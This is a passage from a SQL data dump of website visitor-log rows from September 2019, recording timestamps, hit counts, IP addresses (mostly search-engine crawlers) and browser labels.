568875301,1,1,0,0,'40.77.167.87','other'),(450285,1568875476,1,1,0,0,'5.45.207.19','other'),(450286,1568875972,1,1,0,0,'66.249.66.138','chrome'),(450287,1568876052,2,2,0,0,'91.192.200.14','chrome'),(450288,1568876765,1,1,0,0,'207.46.13.22','other'),(450289,1568876813,1,1,0,0,'178.154.171.69','other'),(450290,1568877276,1,1,0,0,'66.249.66.134','chrome'),(450291,1568877953,1,1,0,0,'40.77.167.119','other'),(450292,1568877958,1,1,0,0,'40.77.167.65','other'),(450293,1568877962,4,4,0,0,'40.77.167.87','other'),(450294,1568877968,2,2,0,0,'207.46.13.22','other'),(450295,1568878122,1,1,0,0,'46.219.231.194','chrome'),(450296,1568878250,1,1,0,0,'91.196.178.75','chrome'),(450297,1568878361,1,1,0,0,'141.8.188.11','other'),(450298,1568878483,1,1,0,0,'5.255.253.25','other'),(450299,1568878890,2,2,0,0,'40.77.167.87','other'),(450300,1568879073,3,2,1,0,'66.249.66.136',''),(450301,1568879621,2,2,0,0,'87.250.224.81','other'),(450302,1568880516,2,2,0,0,'40.77.167.87','other'),(450303,1568880915,1,1,0,0,'40.77.167.119','other'),(450304,1568881050,1,1,0,0,'66.249.66.134','chrome'),(450305,1568881125,1,1,0,0,'66.249.66.138','chrome'),(450306,1568881200,1,1,0,0,'5.188.84.125','chrome'),(450307,1568881489,1,1,0,0,'91.236.250.242','chrome'),(450308,1568881687,1,1,0,0,'40.77.167.87','other'),(450309,1568882073,2,2,0,0,'207.46.13.22','other'),(450310,1568882466,1,1,0,0,'66.249.66.134','chrome'),(450311,1568883247,69,69,0,0,'192.99.7.182','other'),(450312,1568883392,9,9,0,0,'78.46.85.236','other'),(450313,1568883766,1,1,0,0,'66.249.66.134','chrome'),(450314,1568884000,1,1,0,0,'66.249.66.136','chrome'),(450315,1568884161,26,26,0,0,'192.99.7.182','other'),(450316,1568884336,1,1,0,0,'5.45.207.79','other'),(450317,1568884394,2,2,0,0,'8.29.198.26','other'),(450318,1568884607,2,2,0,0,'207.46.13.22','other'),(450319,1568884689,1,1,0,0,'37.9.113.148','other'),(450320,1568885186,1,1,0,0,'207.46.13.123','other'),(450321,1568885297,2,2,0,0,'66.249.66.134','chrome'),(450322,1568885609,1,1,0,0,'40.77.167.65','other'),(450323,1568885679,1,1,0,0,'158.46.140.60','chrome'),(450324,1568885979,1,1,0,0,'37.9.113.148','other'),(450325,1568886561,1,1,0,0,'109.74.154.72','chrome'),(450326,1568886875,34,34,0,0,'192.99.7.182','other'),(450327,1568887460,1,1,0,0,'66.249.66.136','chrome'),(450328,1568888400,1,1,0,0,'66.249.66.68','chrome'),(450329,1568889018,2,2,0,0,'66.249.66.134','chrome'),(450330,1568889062,1,1,0,0,'66.249.66.138','chrome'),(450331,1568889561,1,1,0,0,'207.46.13.123','other'),(450332,1568889643,1,1,0,0,'91.196.178.185','chrome'),(450333,1568889709,2,2,0,0,'66.249.66.136','chrome'),(450334,1568890349,1,1,0,0,'66.249.66.134','chrome'),(450335,1568891015,1,1,0,0,'207.46.13.123','other'),(450336,1568891184,1,1,0,0,'66.249.66.138','chrome'),(450337,1568892025,1,1,0,0,'66.249.66.68','chrome'),(450338,1568892131,1,1,0,0,'66.249.66.138','chrome'),(450339,1568892623,1,1,0,0,'91.196.178.185','chrome'),(450340,1568892642,1,1,0,0,'40.77.167.45','other'),(450341,1568893181,2,2,0,0,'66.249.66.136','chrome'),(450342,1568893623,2,2,0,0,'141.8.188.29','other'),(450343,1568893654,1,1,0,0,'157.55.39.58','other'),(450344,1568893658,2,2,0,0,'40.77.167.96','other'),(450345,1568894565,1,1,0,0,'141.8.188.29','other'),(450346,1568894610,2,2,0,0,'207.46.13.123','other'),(450347,1568894619,1,1,0,0,'95.108.181.96','other'),(450348,1568894665,1,1,0,0,'141.8.188.11','other'),(450349,1568895259,2,2,0,0,'8.29.198.26','other'),(450350,1568895342,1,1,0,0,'180.163.220.67','chrome'),(450351,1568895420,1,1,0,0,'180.163.220.66','chrome'),(450352,1568896766,2,2,0,0,'91.196.178.132','firefox'),(450353,1568897532,2,2,0,0,'5.45.207.79','other'),(450354,1568898177,2,2,0,0,'141.8.188.29','other'),(450355,1568898530,1,1,0,0,'91.196.178.98','chrome'),(450356,1568898644,1,1,0,0,'157.55.39.58','other'),(450357,1568899614,1,1,0,0,'40.77.167.134','other'),(450358,1568900399,1,1,0,0,'40.77.167.96','other'),(450359,1568900737,2,2,0,0,'40.77.167.134','other'),(450360,1568901017,1,1,0,0,'141.8.188.29','other'),(450361,1568901379,1,1,0,0,'66.249.66.66','chrome'),(450362,1568902648,1,1,0,0,'157.55.39.154','other'),(450363,1568902720,1,1,0,0,'46.211.67.155','chrome'),(450364,1568903058,1,0,1,0,'164.132.119.83',''),(450365,1568903211,1,1,0,0,'157.55.39.58','other'),(450366,1568903268,1,1,0,0,'141.8.188.29','other'),(450367,1568903685,1,1,0,0,'157.55.39.227','other'),(450368,1568903808,3,3,0,0,'35.239.16.250','chrome'),(450369,1568903906,5,5,0,0,'104.154.108.178','chrome'),(450370,1568903935,3,3,0,0,'35.238.112.151','chrome'),(450371,1568903954,5,5,0,0,'35.225.48.181','chrome'),(450372,1568904140,1,1,0,0,'95.47.123.234','chrome'),(450373,1568904666,1,1,0,0,'66.249.66.88','chrome'),(450374,1568904995,1,1,0,0,'157.55.39.227','other'),(450375,1568905410,1,1,0,0,'95.108.213.4','other'),(450376,1568905744,1,1,0,0,'141.8.188.11','other'),(450377,1568905993,1,1,0,0,'36.99.136.139','chrome'),(450378,1568905996,1,1,0,0,'36.99.136.138','chrome'),(450379,1568906104,1,1,0,0,'8.29.198.27','other'),(450380,1568906392,1,1,0,0,'8.29.198.26','other'),(450381,1568906865,1,1,0,0,'40.77.167.134','other'),(450382,1568907007,1,1,0,0,'141.8.188.29','other'),(450383,1568907930,1,1,0,0,'157.55.39.154','other'),(450384,1568908949,1,1,0,0,'40.77.167.27','other'),(450385,1568909571,1,1,0,0,'141.8.142.103','other'),(450386,1568910373,1,1,0,0,'94.153.97.236','chrome'),(450387,1568911302,1,1,0,0,'157.55.39.154','other'),(450388,1568911392,1,1,0,0,'207.46.13.171','other'),(450389,1568912311,1,1,0,0,'5.45.207.79','other'),(450390,1568912446,1,1,0,0,'141.8.188.29','other'),(450391,1568912962,1,1,0,0,'66.249.66.134','chrome'),(450392,1568913412,1,1,0,0,'66.249.66.138','chrome'),(450393,1568915071,1,1,0,0,'141.8.188.29','other'),(450394,1568915111,1,1,0,0,'5.45.207.79','other'),(450395,1568916967,2,2,0,0,'8.29.198.26','other'),(450396,1568917561,1,1,0,0,'207.46.13.131','other'),(450397,1568918106,1,1,0,0,'87.250.224.47','other'),(450398,1568918112,1,1,0,0,'5.45.207.79','other'),(450399,1568920960,1,1,0,0,'209.208.111.137','chrome'),(450400,1568921280,1,1,0,0,'31.13.127.7','other'),(450401,1568922202,1,1,0,0,'5.45.207.79','other'),(450402,1568922711,1,1,0,0,'157.55.39.215','other'),(450403,1568922854,2,2,0,0,'207.46.13.131','other'),(450404,1568923942,3,3,0,0,'207.46.13.103','other'),(450405,1568924966,2,2,0,0,'207.46.13.171','other'),(450406,1568925080,1,1,0,0,'141.8.188.29','other'),(450407,1568925092,1,1,0,0,'141.8.188.11','other'),(450408,1568926518,1,1,0,0,'141.8.188.29','other'),(450409,1568927811,2,2,0,0,'8.29.198.25','other'),(450410,1568928479,1,1,0,0,'207.46.13.131','other'),(450411,1568928754,2,2,0,0,'207.46.13.103','other'),(450412,1568929023,1,1,0,0,'207.46.13.171','other'),(450413,1568929452,2,2,0,0,'141.8.188.29','other'),(450414,1568931073,1,1,0,0,'82.212.137.8','chrome'),(450415,1568931613,1,1,0,0,'141.8.188.29','other'),(450416,1568933262,1,1,0,0,'207.46.13.103','other'),(450417,1568933329,1,1,0,0,'95.108.213.4','other'),(450418,1568934224,1,1,0,0,'141.8.188.11','other'),(450419,1568935212,1,1,0,0,'207.46.13.103','other'),(450420,1568935830,1,1,0,0,'5.45.207.19','other'),(450421,1568935876,1,1,0,0,'141.8.188.11','other'),(450422,1568935964,1,1,0,0,'141.8.188.29','other'),(450423,1568937751,1,1,0,0,'37.9.113.148','other'),(450424,1568937754,1,1,0,0,'5.45.207.19','other'),(450425,1568937937,1,1,0,0,'141.8.188.29','other'),(450426,1568938662,2,2,0,0,'8.29.198.27','other'),(450427,1568938932,1,1,0,0,'207.46.13.103','other'),(450428,1568939539,1,1,0,0,'141.8.188.11','other'),(450429,1568939931,1,1,0,0,'157.55.39.140','other'),(450430,1568941317,1,1,0,0,'207.46.13.103','other'),(450431,1568942616,1,1,0,0,'13.66.139.0','other'),(450432,1568942891,1,1,0,0,'66.249.64.60','chrome'),(450433,1568943042,1,1,0,0,'66.249.64.30','chrome'),(450434,1568943372,1,1,0,0,'141.8.188.29','other'),(450435,1568943691,1,1,0,0,'40.77.167.113','other'),(450436,1568944107,1,1,0,0,'40.77.167.169','other'),(450437,1568944672,1,1,0,0,'213.180.203.40','other'),(450438,1568945351,1,1,0,0,'66.249.64.60','chrome'),(450439,1568945755,2,2,0,0,'40.77.167.113','other'),(450440,1568947241,2,2,0,0,'157.55.39.140','other'),(450441,1568947277,2,2,0,0,'40.77.167.113','other'),(450442,1568948430,2,2,0,0,'157.55.39.140','other'),(450443,1568949511,1,1,0,0,'8.29.198.25','other'),(450444,1568949694,2,2,0,0,'141.8.188.29','other'),(450445,1568949833,1,1,0,0,'8.29.198.27','other'),(450446,1568950825,2,2,0,0,'207.46.13.120','other'),(450447,1568952550,1,1,0,0,'40.77.167.113','other'),(450448,1568952567,1,1,0,0,'5.45.207.79','other'),(450449,1568953857,2,2,0,0,'40.77.167.90','other'),(450450,1568953908,1,1,0,0,'40.77.167.169','other'),(450451,1568954081,1,1,0,0,'40.77.167.113','other'),(450452,1568954143,1,1,0,0,'5.255.253.38','other'),(450453,1568954323,1,1,0,0,'66.249.64.62','chrome'),(450454,1568954443,1,1,0,0,'66.249.64.60','chrome'),(450455,1568954673,1,1,0,0,'62.205.134.182','other'),(450456,1568955616,1,1,0,0,'40.77.167.113','other'),(450457,1568955820,2,2,0,0,'141.8.188.29','other'),(450458,1568956908,1,1,0,0,'87.250.224.81','other'),(450459,1568958060,1,1,0,0,'66.249.64.30','chrome'),(450460,1568958194,1,1,0,0,'94.180.160.222','msie'),(450461,1568958256,1,1,0,0,'40.77.167.217','other'),(450462,1568959535,1,1,0,0,'66.249.64.60','chrome'),(450463,1568960357,1,1,0,0,'8.29.198.25','other'),(450464,1568960542,1,1,0,0,'157.55.39.251','other'),(450465,1568960686,1,1,0,0,'8.29.198.27','other'),(450466,1568961419,1,1,0,0,'95.47.123.234','chrome'),(450467,1568962607,1,1,0,0,'91.196.178.73','chrome'),(450468,1568963454,1,1,0,0,'141.8.188.29','other'),(450469,1568963909,2,2,0,0,'157.55.39.123','other'),(450470,1568964070,2,2,0,0,'157.55.39.140','other'),(450471,1568964083,1,1,0,0,'91.196.178.73','chrome'),(450472,1568964689,1,1,0,0,'40.77.167.90','other'),(450473,1568965647,1,1,0,0,'40.77.167.90','other'),(450474,1568965748,1,1,0,0,'94.178.159.206','chrome'),(450475,1568966180,2,2,0,0,'141.8.188.11','other'),(450476,1568966209,1,1,0,0,'5.45.207.19','other'),(450477,1568966387,1,1,0,0,'91.196.178.73','chrome'),(450478,1568966616,2,2,0,0,'40.77.167.103','other'),(450479,1568967760,1,1,0,0,'40.77.167.41','other'),(450480,1568967852,2,2,0,0,'94.178.159.206','chrome'),(450481,1568968239,1,1,0,0,'5.83.22.64','chrome'),(450482,1568968993,1,1,0,0,'91.196.178.73','chrome'),(450483,1568969101,1,1,0,0,'66.249.64.30','chrome'),(450484,1568970224,1,1,0,0,'91.196.178.73','chrome'),(450485,1568971109,1,1,0,0,'40.77.167.163','other'),(450486,1568971146,1,1,0,0,'91.196.178.73','chrome'),(450487,1568971190,2,2,0,0,'8.29.198.26','other'),(450488,1568971892,2,2,0,0,'141.8.188.11','other'),(450489,1568972026,1,1,0,0,'141.8.188.29','other'),(450490,1568972257,2,2,0,0,'40.77.167.41','other'),(450491,1568972555,1,1,0,0,'207.46.13.159','other'),(450492,1568972708,1,1,0,0,'91.196.178.172','chrome'),(450493,1568974291,1,1,0,0,'95.134.189.48','firefox'),(450494,1568974984,1,1,0,0,'141.8.188.11','other'),(450495,1568975478,1,1,0,0,'207.46.13.193','other'),(450496,1568977416,1,1,0,0,'157.55.39.88','other'),(450497,1568977645,1,1,0,0,'157.55.39.35','other'),(450498,1568978249,1,1,0,0,'91.196.178.172','chrome'),(450499,1568978845,1,1,0,0,'157.55.39.88','other'),(450500,1568978904,1,1,0,0,'91.196.178.73','chrome'),(450501,1568979986,1,1,0,0,'157.55.39.88','other'),(450502,1568980116,2,2,0,0,'157.55.39.91','other'),(450503,1568980229,2,2,0,0,'157.55.39.35','other'),(450504,1568980285,1,1,0,0,'109.74.154.72','chrome'),(450505,1568980328,1,1,0,0,'5.45.207.79','other'),(450506,1568980655,1,1,0,0,'66.249.64.31','chrome'),(450507,1568980673,1,1,0,0,'66.249.64.30','chrome'),(450508,1568981123,1,1,0,0,'91.196.178.73','chrome'),(450509,1568981351,1,1,0,0,'5.45.207.79','other'),(450510,1568981478,1,1,0,0,'95.108.213.8','other'),(450511,1568982035,1,1,0,0,'8.29.198.26','other'),(450512,1568982385,1,1,0,0,'91.196.178.73','chrome'),(450513,1568982396,1,1,0,0,'8.29.198.25','other'),(450514,1568982502,1,1,0,0,'66.249.64.30','chrome'),(450515,1568982899,1,1,0,0,'5.45.207.79','other'),(450516,1568983289,1,1,0,0,'157.55.39.91','other'),(450517,1568984120,1,1,0,0,'141.8.188.29','other'),(450518,1568986465,1,1,0,0,'141.8.142.103','chrome'),(450519,1568987411,1,1,0,0,'157.55.39.35','other'),(450520,1568987643,1,1,0,0,'141.8.188.29','other'),(450521,1568987669,1,1,0,0,'37.9.113.20','chrome'),(450522,1568987957,1,1,0,0,'141.8.188.11','other'),(450523,1568989501,1,1,0,0,'5.45.207.19','other'),(450524,1568990268,3,3,0,0,'35.238.102.26','chrome'),(450525,1568990372,3,3,0,0,'104.197.46.30','chrome'),(450526,1568990405,3,3,0,0,'34.66.132.128','chrome'),(450527,1568990416,2,2,0,0,'35.224.71.172','chrome'),(450529,1568990428,5,5,0,0,'35.188.140.120','chrome'),(450530,1568990688,1,1,0,0,'5.45.207.8','chrome'),(450531,1568990837,1,1,0,0,'213.180.203.9','other'),(450532,1568990995,1,1,0,0,'40.77.167.51','other'),(450533,1568992452,1,1,0,0,'141.8.188.11','other'),(450534,1568992506,1,1,0,0,'141.8.188.65','chrome'),(450535,1568992916,2,2,0,0,'8.29.198.25','other'),(450536,1568993077,1,1,0,0,'157.55.39.91','other'),(450537,1568993561,1,1,0,0,'40.77.167.51','other'),(450538,1568994079,1,1,0,0,'95.108.181.83','other'),(450539,1568994090,1,1,0,0,'95.108.181.75','other'),(450540,1568994183,1,1,0,0,'87.250.224.118','chrome'),(450541,1568995531,1,1,0,0,'162.243.162.201','firefox'),(450542,1568995973,2,2,0,0,'157.55.39.35','other'),(450543,1568996218,1,1,0,0,'157.55.39.96','other'),(450544,1568996627,1,1,0,0,'95.216.14.217','chrome'),(450545,1568997091,1,1,0,0,'87.250.224.81','other'),(450546,1568997111,1,1,0,0,'95.108.181.75','other'),(450547,1568998475,2,2,0,0,'40.77.167.51','other'),(450548,1568998984,1,1,0,0,'77.222.143.222','msie'),(450549,1568999160,1,1,0,0,'37.9.113.20','other'),(450550,1569000259,1,1,0,0,'40.77.167.51','other'),(450551,1569000408,1,1,0,0,'95.108.181.83','other'),(450552,1569001070,1,1,0,0,'77.111.244.115','chrome'),(450553,1569001634,1,1,0,0,'40.77.167.51','other'),(450554,1569001639,1,1,0,0,'157.55.39.96','other'),(450555,1569002719,1,1,0,0,'95.24.19.254','msie'),(450556,1569003242,1,1,0,0,'207.46.13.25','other'),(450557,1569003306,1,1,0,0,'176.36.195.210','chrome'),(450558,1569003660,1,1,0,0,'40.77.167.209','other'),(450559,1569003769,1,1,0,0,'8.29.198.25','other'),(450560,1569004166,1,1,0,0,'8.29.198.27','other'),(450561,1569005696,1,1,0,0,'141.8.188.11','other'),(450562,1569006398,1,1,0,0,'40.77.167.51','other'),(450563,1569007199,1,1,0,0,'141.8.188.29','other'),(450564,1569007246,1,1,0,0,'40.77.167.9','other'),(450565,1569008273,1,1,0,0,'40.77.167.9','other'),(450566,1569009651,1,1,0,0,'157.55.39.96','other'),(450567,1569009707,1,1,0,0,'207.46.13.18','other'),(450568,1569010136,1,1,0,0,'141.8.188.29','other'),(450569,1569012500,1,1,0,0,'209.17.96.242','other'),(450570,1569012512,1,1,0,0,'141.8.188.11','other'),(450571,1569012873,1,1,0,0,'66.249.64.30','chrome'),(450572,1569013070,1,1,0,0,'157.55.39.96','other'),(450573,1569013258,1,1,0,0,'40.77.167.51','other'),(450574,1569013336,1,1,0,0,'91.209.11.236','other'),(450575,1569014616,1,1,0,0,'8.29.198.27','other'),(450576,1569015034,1,1,0,0,'8.29.198.26','other'),(450577,1569016101,2,2,0,0,'207.46.13.18','other'),(450578,1569017137,1,1,0,0,'157.55.39.96','other'),(450579,1569018130,1,1,0,0,'141.8.188.29','other'),(450580,1569018511,2,2,0,0,'141.8.188.11','other'),(450581,1569018939,1,1,0,0,'207.46.13.229','other'),(450582,1569020384,1,1,0,0,'207.46.13.229','other'),(450583,1569020641,1,1,0,0,'40.77.167.163','other'),(450584,1569021019,1,1,0,0,'40.77.167.9','other'),(450585,1569021111,1,1,0,0,'40.77.167.138','other'),(450586,1569022044,1,1,0,0,'5.45.207.19','chrome'),(450587,1569022255,1,1,0,0,'209.17.97.74','other'),(450588,1569022366,1,1,0,0,'40.77.167.9','other'),(450589,1569022568,3,3,0,0,'207.46.13.229','other'),(450590,1569024329,1,1,0,0,'40.77.167.163','other'),(450591,1569024348,1,1,0,0,'40.77.167.138','other'),(450592,1569025470,1,1,0,0,'8.29.198.25','other'),(450593,1569025721,1,1,0,0,'141.8.188.29','chrome'),(450594,1569025880,1,1,0,0,'8.29.198.26','other'),(450595,1569026651,1,1,0,0,'91.209.11.236','other'),(450596,1569027401,1,1,0,0,'40.77.167.115','other'),(450597,1569027788,1,1,0,0,'157.55.39.40','other'),(450598,1569027866,2,2,0,0,'40.77.167.163','other'),(450599,1569028347,2,2,0,0,'141.8.188.29','other'),(450600,1569029354,1,1,0,0,'141.8.188.11','other'),(450601,1569029854,3,3,0,0,'99.229.205.200','other'),(450602,1569030877,1,1,0,0,'99.229.205.200','other'),(450603,1569033142,1,1,0,0,'207.46.13.3','other'),(450604,1569033436,1,1,0,0,'37.9.113.148','chrome'),(450605,1569035025,1,1,0,0,'40.77.167.154','other'),(450606,1569035129,1,1,0,0,'40.77.167.115','other'),(450607,1569035518,1,1,0,0,'141.8.188.29','chrome'),(450608,1569036314,1,1,0,0,'8.29.198.26','other'),(450609,1569036739,1,1,0,0,'8.29.198.25','other'),(450610,1569037566,1,1,0,0,'40.77.167.151','other'),(450611,1569037594,1,1,0,0,'141.8.188.11','other'),(450612,1569038474,1,1,0,0,'40.77.167.54','other'),(450613,1569040403,1,1,0,0,'40.77.167.154','other'),(450614,1569041092,1,1,0,0,'62.205.134.182','other'),(450615,1569041544,1,1,0,0,'91.196.178.136','firefox'),(450616,1569041648,3,3,0,0,'40.77.167.54','other'),(450617,1569041881,1,1,0,0,'95.108.181.83','chrome'),(450618,1569041938,1,1,0,0,'141.8.188.11','other'),(450619,1569042322,1,1,0,0,'31.13.127.20','other'),(450620,1569042912,2,2,0,0,'5.45.207.79','chrome'),(450621,1569045086,1,1,0,0,'66.249.64.60','chrome'),(450622,1569047154,1,1,0,0,'8.29.198.26','other'),(450623,1569047266,1,1,0,0,'157.55.39.240','other'),(450624,1569047593,1,1,0,0,'8.29.198.27','other'),(450625,1569047911,1,1,0,0,'207.46.13.115','other'),(450626,1569048068,1,1,0,0,'207.46.13.234','other'),(450627,1569048889,1,1,0,0,'141.8.188.11','chrome'),(450628,1569049898,1,1,0,0,'141.8.188.11','other'),(450629,1569051466,1,1,0,0,'141.8.188.29','other'),(450630,1569052461,1,1,0,0,'207.46.13.208','other'),(450631,1569052611,1,1,0,0,'157.55.39.220','other'),(450632,1569053205,1,1,0,0,'13.66.139.0','other'),(450633,1569053698,1,1,0,0,'91.196.178.59','chrome'),(450634,1569053752,1,1,0,0,'91.209.11.236','other'),(450635,1569055240,1,1,0,0,'66.249.64.31','chrome'),(450636,1569057589,1,0,1,0,'66.249.64.31',''),(450637,1569058008,2,2,0,0,'8.29.198.27','other'),(450638,1569058207,1,1,0,0,'95.134.184.159','chrome'),(450639,1569060389,1,1,0,0,'66.249.64.62','chrome'),(450640,1569060596,1,1,0,0,'94.178.146.176','chrome'),(450641,1569060768,1,1,0,0,'157.55.39.220','other'),(450642,1569060999,1,1,0,0,'66.249.64.30','chrome'),(450643,1569061180,1,1,0,0,'66.249.64.31','chrome'),(450644,1569061857,1,1,0,0,'157.55.39.220','other'),(450645,1569063077,1,1,0,0,'66.249.64.58','chrome'),(450646,1569063204,2,2,0,0,'157.55.39.220','other'),(450647,1569064511,2,2,0,0,'66.249.64.30','chrome'),(450648,1569064676,2,2,0,0,'157.55.39.220','other'),(450649,1569064784,1,1,0,0,'40.77.167.29','other'),(450650,1569064931,1,1,0,0,'109.74.154.72','chrome'),(450651,1569064935,1,1,0,0,'66.249.64.31','chrome'),(450652,1569065416,1,1,0,0,'91.124.183.193','chrome'),(450653,1569065791,1,1,0,0,'91.196.178.164','chrome'),(450654,1569065828,1,1,0,0,'91.124.83.133','chrome'),(450655,1569066534,1,1,0,0,'157.55.39.220','other'),(450656,1569067048,1,1,0,0,'91.196.178.50','chrome'),(450657,1569067405,1,1,0,0,'91.209.11.236','other'),(450658,1569067700,1,1,0,0,'66.249.64.30','chrome'),(450659,1569067781,1,1,0,0,'188.190.174.250','firefox'),(450660,1569067937,1,1,0,0,'31.13.127.16','other'),(450661,1569067939,1,1,0,0,'31.13.127.6','other'),(450663,1569067938,1,1,0,0,'31.13.127.23','other'),(450664,1569068859,1,1,0,0,'8.29.198.27','other'),(450665,1569069283,1,1,0,0,'8.29.198.25','other'),(450666,1569069443,1,1,0,0,'40.77.167.56','other'),(450667,1569069655,1,1,0,0,'40.77.167.29','other'),(450668,1569071048,1,1,0,0,'157.55.39.189','other'),(450669,1569071361,1,1,0,0,'91.124.238.237','chrome'),(450670,1569072477,1,1,0,0,'5.45.207.19','chrome'),(450671,1569072998,2,2,0,0,'40.77.167.56','other'),(450672,1569075025,1,1,0,0,'40.77.167.56','other'),(450673,1569075371,1,1,0,0,'66.249.64.31','chrome'),(450674,1569075518,1,1,0,0,'87.250.224.65','chrome'),(450675,1569075565,1,1,0,0,'141.8.188.29','other'),(450676,1569076910,3,3,0,0,'34.68.172.250','chrome'),(450677,1569076969,3,3,0,0,'34.67.99.146','chrome'),(450678,1569076990,3,3,0,0,'35.224.131.6','chrome'),(450679,1569077001,5,5,0,0,'35.222.208.254','chrome'),(450680,1569077023,3,3,0,0,'35.224.28.207','chrome'),(450681,1569077550,2,2,0,0,'91.196.178.174','chrome'),(450682,1569077558,1,1,0,0,'91.196.178.174','firefox'),(450683,1569077683,1,1,0,0,'5.45.207.79','other'),(450684,1569078753,1,1,0,0,'40.77.167.121','other'),(450685,1569078796,1,1,0,0,'157.55.39.212','other'),(450686,1569079076,1,1,0,0,'223.24.60.1','chrome'),(450687,1569079169,1,1,0,0,'141.8.188.11','other'),(450688,1569079540,2,1,1,0,'66.249.64.58',''),(450689,1569079710,2,2,0,0,'8.29.198.27','other'),(450690,1569079795,1,1,0,0,'40.77.167.82','other'),(450691,1569080018,1,1,0,0,'91.196.178.174','chrome'),(450692,1569080908,1,1,0,0,'141.8.188.29','chrome'),(450693,1569080909,1,1,0,0,'40.77.167.175','other'),(450694,1569081195,1,1,0,0,'188.163.16.129','chrome'),(450695,1569081241,1,1,0,0,'95.108.213.8','other'),(450696,1569082327,1,1,0,0,'40.77.167.175','other'),(450697,1569083540,1,1,0,0,'91.196.178.174','chrome'),(450698,1569084533,1,1,0,0,'66.249.64.62','chrome'),(450699,1569085086,1,1,0,0,'157.55.39.212','other'),(450700,1569085333,1,1,0,0,'141.8.188.11','chrome'),(450701,1569086386,1,1,0,0,'141.8.188.11','chrome'),(450702,1569086919,2,2,0,0,'51.15.141.220','firefox'),(450703,1569088050,1,1,0,0,'91.196.178.33','chrome'),(450704,1569090315,1,1,0,0,'5.45.207.19','chrome'),(450705,1569090329,1,1,0,0,'66.249.64.31','chrome'),(450706,1569090470,1,1,0,0,'141.8.188.29','other'),(450707,1569090558,1,1,0,0,'8.29.198.26','other'),(450708,1569090960,1,1,0,0,'8.29.198.25','other'),(450709,1569091081,1,1,0,0,'66.249.64.30','chrome'),(450710,1569091733,1,1,0,0,'87.250.224.47','chrome'),(450711,1569091983,1,1,0,0,'66.249.64.31','chrome'),(450712,1569092676,1,1,0,0,'141.8.188.11','chrome'),(450713,1569092685,1,1,0,0,'141.8.188.11','other'),(450714,1569092714,1,1,0,0,'95.108.213.8','chrome'),(450715,1569093167,1,1,0,0,'66.249.64.58','chrome'),(450716,1569093583,1,1,0,0,'91.196.178.188','chrome'),(450717,1569093824,1,1,0,0,'141.8.188.29','other'),(450718,1569094172,1,1,0,0,'207.46.13.193','other'),(450719,1569095824,1,1,0,0,'66.249.64.58','chrome'),(450720,1569095968,1,1,0,0,'141.8.188.29','other'),(450721,1569095993,1,1,0,0,'5.45.207.79','chrome'),(450722,1569097177,2,2,0,0,'40.77.167.90','other'),(450723,1569097272,1,1,0,0,'207.46.13.143','other'),(450724,1569097530,1,1,0,0,'66.249.64.62','chrome'),(450725,1569097679,1,1,0,0,'66.249.64.60','chrome'),(450726,1569098672,1,1,0,0,'141.8.188.29','chrome'),(450727,1569098923,1,1,0,0,'66.249.64.31','chrome'),(450728,1569101329,1,1,0,0,'66.249.64.60','chrome'),(450729,1569101428,1,1,0,0,'35.225.12.225','other'),(450730,1569101429,1,1,0,0,'8.29.198.26','other'),(450731,1569101462,2,2,0,0,'207.46.13.28','other'),(450732,1569101804,1,1,0,0,'8.29.198.25','other'),(450733,1569101821,1,1,0,0,'207.46.13.193','other'),(450734,1569103453,3,3,0,0,'141.8.188.29','other'),(450735,1569104515,1,1,0,0,'207.46.13.79','other'),(450736,1569104518,1,1,0,0,'66.249.64.31','chrome'),(450737,1569104768,1,1,0,0,'66.249.64.60','chrome'),(450738,1569105098,1,1,0,0,'207.46.13.153','other'),(450739,1569105238,2,2,0,0,'141.8.188.11','other'),(450740,1569106294,1,1,0,0,'13.66.139.0','other'),(450741,1569106507,1,1,0,0,'207.46.13.153','other'),(450742,1569106602,1,1,0,0,'194.61.24.94','firefox'),(450743,1569106604,1,1,0,0,'66.249.64.31','chrome'),(450744,1569107449,1,1,0,0,'40.77.167.94','other'),(450745,1569107676,2,2,0,0,'66.249.64.31','chrome'),(450746,1569108361,1,1,0,0,'40.77.167.94','other'),(450747,1569108720,1,1,0,0,'66.249.64.30','chrome'),(450748,1569109330,1,1,0,0,'40.77.167.48','other'),(450749,1569109372,1,1,0,0,'66.249.66.136','chrome'),(450750,1569109464,1,1,0,0,'5.45.207.79','other'),(450751,1569109892,1,1,0,0,'141.8.188.29','other'),(450752,1569110263,1,1,0,0,'66.249.66.134','chrome'),(450753,1569110313,2,2,0,0,'66.249.66.138','chrome'),(450754,1569111302,1,1,0,0,'141.8.188.11','other'),(450755,1569111647,2,2,0,0,'40.77.167.94','other'),(450756,1569112198,1,1,0,0,'141.8.188.29','other'),(450757,1569112280,1,1,0,0,'8.29.198.26','other'),(450758,1569112639,1,1,0,0,'8.29.198.27','other'),(450759,1569113709,1,1,0,0,'141.8.188.11','other'),(450760,1569114428,3,3,0,0,'66.249.66.138','chrome'),(450761,1569115128,1,1,0,0,'5.45.207.79','chrome'),(450762,1569115386,1,1,0,0,'141.8.188.29','other'),(450763,1569115851,1,1,0,0,'157.55.39.181','other'),(450764,1569116389,1,1,0,0,'141.8.188.29','chrome'),(450765,1569116424,1,1,0,0,'66.249.66.138','chrome'),(450766,1569117978,1,1,0,0,'37.9.113.103','other'),(450767,1569119220,2,2,0,0,'141.8.188.29','other'),(450768,1569119704,1,1,0,0,'213.180.203.9','other'),(450769,1569119768,1,1,0,0,'37.9.113.148','other'),(450770,1569119973,1,1,0,0,'66.249.66.134','chrome'),(450771,1569121040,1,1,0,0,'141.8.188.29','other'),(450772,1569122302,2,2,0,0,'157.55.39.53','other'),(450773,1569122690,2,2,0,0,'66.249.66.134','chrome'),(450774,1569122921,1,1,0,0,'66.249.66.136','chrome'),(450775,1569123127,2,2,0,0,'8.29.198.26','other'),(450776,1569123192,1,1,0,0,'66.249.66.68','chrome'),(450777,1569124469,2,2,0,0,'157.55.39.53','other'),(450778,1569125197,1,1,0,0,'66.249.66.138','chrome'),(450779,1569126752,1,1,0,0,'5.45.207.79','other'),(450780,1569126857,1,1,0,0,'141.8.188.29','other'),(450781,1569127314,1,1,0,0,'40.77.167.8','other'),(450782,1569127428,1,1,0,0,'62.205.134.182','other'),(450783,1569128408,1,1,0,0,'5.45.207.19','chrome'),(450784,1569129373,1,1,0,0,'157.55.39.189','other'),(450785,1569129549,1,1,0,0,'66.249.66.136','chrome'),(450786,1569129963,2,2,0,0,'141.8.188.29','other'),(450787,1569130201,1,1,0,0,'141.8.188.11','chrome'),(450788,1569130461,1,1,0,0,'157.55.39.189','other'),(450789,1569130782,1,1,0,0,'66.249.66.64','chrome'),(450790,1569131335,1,1,0,0,'141.8.188.11','other'),(450791,1569131657,1,1,